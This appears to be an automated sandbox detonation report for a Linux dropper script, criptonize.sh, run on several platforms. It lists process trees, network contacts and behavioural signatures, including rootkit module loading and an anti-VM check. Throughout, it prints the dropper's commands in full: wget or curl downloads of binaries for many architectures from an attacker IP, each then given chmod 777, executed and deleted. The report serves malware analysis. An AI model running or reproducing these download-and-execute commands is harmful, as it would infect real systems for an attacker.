[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/bin/rm

[rm -f criptonize.x86_64]

/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/bin/rm

[rm -f criptonize.i686]

/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/bin/rm

[rm -f criptonize.i586]

/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/bin/rm

[rm -f criptonize.i486]

/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/bin/rm

[rm -f criptonize.aarch64]

/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/bin/rm

[rm -f criptonize.armv7l]

/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/bin/rm

[rm -f criptonize.armv6l]

/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/wget

[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/bin/rm

[rm -f criptonize.armv5l]

/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/wget

[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/bin/rm

[rm -f criptonize.armv4eb]

/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/wget

[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/bin/rm

[rm -f criptonize.armv4tl]

/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/wget

[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/bin/rm

[rm -f criptonize.armv4l]

/bin/rm

[rm -f criptonize.mips64]

/usr/bin/wget

[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/bin/rm

[rm -f criptonize.mips64]

/bin/rm

[rm -f criptonize.mips]

/usr/bin/wget

[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]

/bin/chmod

[chmod 777 criptonize.mips]

/tmp/criptonize.mips

[./criptonize.mips mips]

/bin/rm

[rm -f criptonize.mips]

/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/wget

[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]

Network

Country Destination Domain Proto
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 N/A tcp

Files

memory/712-1-0xb672a000-0xb673b044-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

debian9-mipsbe-20240611-en

Max time kernel

30s

Max time network

33s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/bin/rm

[rm -f criptonize.x86_64]

/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/bin/rm

[rm -f criptonize.i686]

/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/bin/rm

[rm -f criptonize.i586]

/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/bin/rm

[rm -f criptonize.i486]

/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/bin/rm

[rm -f criptonize.aarch64]

/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/bin/rm

[rm -f criptonize.armv7l]

/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

Network

Country Destination Domain Proto
RU 212.60.5.174:80 212.60.5.174 tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

28s

Max time network

33s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes memory of remote process

Description Indicator Process Target
N/A N/A /tmp/criptonize.i686 N/A
N/A N/A /tmp/criptonize.i586 N/A

Loads a kernel module

rootkit
Description Indicator Process Target
N/A N/A /tmp/criptonize.i686 N/A
N/A N/A /tmp/criptonize.i586 N/A
N/A N/A /tmp/criptonize.i486 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.mips /usr/bin/wget N/A
File opened for modification /tmp/criptonize.m68k /usr/bin/wget N/A
File opened for modification /tmp/criptonize.sh4 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.arc700 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mipsel /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.bsdamd64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/wget N/A
File opened for modification /tmp/criptonize.sparc /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.powerpc /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4eb /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/usr/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/usr/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/usr/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/usr/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/usr/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/usr/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/usr/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/wget

[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/usr/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/wget

[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/usr/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/wget

[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/usr/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/wget

[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/usr/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/wget

[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/usr/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/wget

[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]

/usr/bin/chmod

[chmod 777 criptonize.mips]

/tmp/criptonize.mips

[./criptonize.mips mips]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/wget

[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]

/usr/bin/chmod

[chmod 777 criptonize.mipsel]

/tmp/criptonize.mipsel

[./criptonize.mipsel mipsel]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/wget

[wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc]

/usr/bin/chmod

[chmod 777 criptonize.powerpc]

/tmp/criptonize.powerpc

[./criptonize.powerpc powerpc]

/usr/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/rm

[rm -f criptonize.m68k]

/usr/bin/wget

[wget -O criptonize.m68k http://212.60.5.174/criptonize.m68k]

/usr/bin/chmod

[chmod 777 criptonize.m68k]

/tmp/criptonize.m68k

[./criptonize.m68k m68k]

/usr/bin/rm

[rm -f criptonize.m68k]

/usr/bin/rm

[rm -f criptonize.sh4]

/usr/bin/wget

[wget -O criptonize.sh4 http://212.60.5.174/criptonize.sh4]

/usr/bin/chmod

[chmod 777 criptonize.sh4]

/tmp/criptonize.sh4

[./criptonize.sh4 sh4]

/usr/bin/rm

[rm -f criptonize.sh4]

/usr/bin/rm

[rm -f criptonize.sparc]

/usr/bin/wget

[wget -O criptonize.sparc http://212.60.5.174/criptonize.sparc]

/usr/bin/chmod

[chmod 777 criptonize.sparc]

/tmp/criptonize.sparc

[./criptonize.sparc sparc]

/usr/bin/rm

[rm -f criptonize.sparc]

/usr/bin/rm

[rm -f criptonize.arc700]

/usr/bin/wget

[wget -O criptonize.arc700 http://212.60.5.174/criptonize.arc700]

/usr/bin/chmod

[chmod 777 criptonize.arc700]

/tmp/criptonize.arc700

[./criptonize.arc700 arc700]

/usr/bin/rm

[rm -f criptonize.arc700]

/usr/bin/rm

[rm -f criptonize.bsdamd64]

/usr/bin/wget

[wget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd64]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
RU 212.60.5.174:80 212.60.5.174 tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

debian12-armhf-20240729-en

Max time kernel

29s

Max time network

31s

Command Line

[/tmp/criptonize.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.mipsel /usr/bin/curl N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/curl N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/curl N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/curl N/A
File opened for modification /tmp/criptonize.mips64 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/curl N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/curl N/A
File opened for modification /tmp/criptonize.mips /usr/bin/curl N/A
File opened for modification /tmp/criptonize.sh4 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.armv4eb /usr/bin/curl N/A
File opened for modification /tmp/criptonize.powerpc /usr/bin/curl N/A
File opened for modification /tmp/criptonize.m68k /usr/bin/curl N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/curl

[curl -o criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/usr/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/curl

[curl -o criptonize.i686 http://212.60.5.174/criptonize.i686]

/usr/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/curl

[curl -o criptonize.i586 http://212.60.5.174/criptonize.i586]

/usr/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/curl

[curl -o criptonize.i486 http://212.60.5.174/criptonize.i486]

/usr/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/curl

[curl -o criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/usr/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/curl

[curl -o criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/usr/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/curl

[curl -o criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/usr/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/curl

[curl -o criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/usr/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/curl

[curl -o criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/usr/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/curl

[curl -o criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/usr/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/curl

[curl -o criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/usr/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/curl

[curl -o criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/usr/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/curl

[curl -o criptonize.mips http://212.60.5.174/criptonize.mips]

/usr/bin/chmod

[chmod 777 criptonize.mips]

/tmp/criptonize.mips

[./criptonize.mips mips]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/curl

[curl -o criptonize.mipsel http://212.60.5.174/criptonize.mipsel]

/usr/bin/chmod

[chmod 777 criptonize.mipsel]

/tmp/criptonize.mipsel

[./criptonize.mipsel mipsel]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/curl

[curl -o criptonize.powerpc http://212.60.5.174/criptonize.powerpc]

/usr/bin/chmod

[chmod 777 criptonize.powerpc]

/tmp/criptonize.powerpc

[./criptonize.powerpc powerpc]

/usr/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/rm

[rm -f criptonize.m68k]

/usr/bin/curl

[curl -o criptonize.m68k http://212.60.5.174/criptonize.m68k]

/usr/bin/chmod

[chmod 777 criptonize.m68k]

/tmp/criptonize.m68k

[./criptonize.m68k m68k]

/usr/bin/rm

[rm -f criptonize.m68k]

/usr/bin/rm

[rm -f criptonize.sh4]

/usr/bin/curl

[curl -o criptonize.sh4 http://212.60.5.174/criptonize.sh4]

/usr/bin/chmod

[chmod 777 criptonize.sh4]

/tmp/criptonize.sh4

[./criptonize.sh4 sh4]

/usr/bin/rm

[rm -f criptonize.sh4]

/usr/bin/rm

[rm -f criptonize.sparc]

/usr/bin/curl

[curl -o criptonize.sparc http://212.60.5.174/criptonize.sparc]

Network

Country Destination Domain Proto
RU 212.60.5.174:80 212.60.5.174 tcp
US 1.1.1.1:53 debian12-armhf-20240729-en-10 udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:57

Platform

debian12-mipsel-20240418-en

Max time kernel

0s

Max time network

13s

Command Line

[/tmp/criptonize.sh]

Signatures

N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian12-mipsel-20240418-en-14 udp

Files

N/A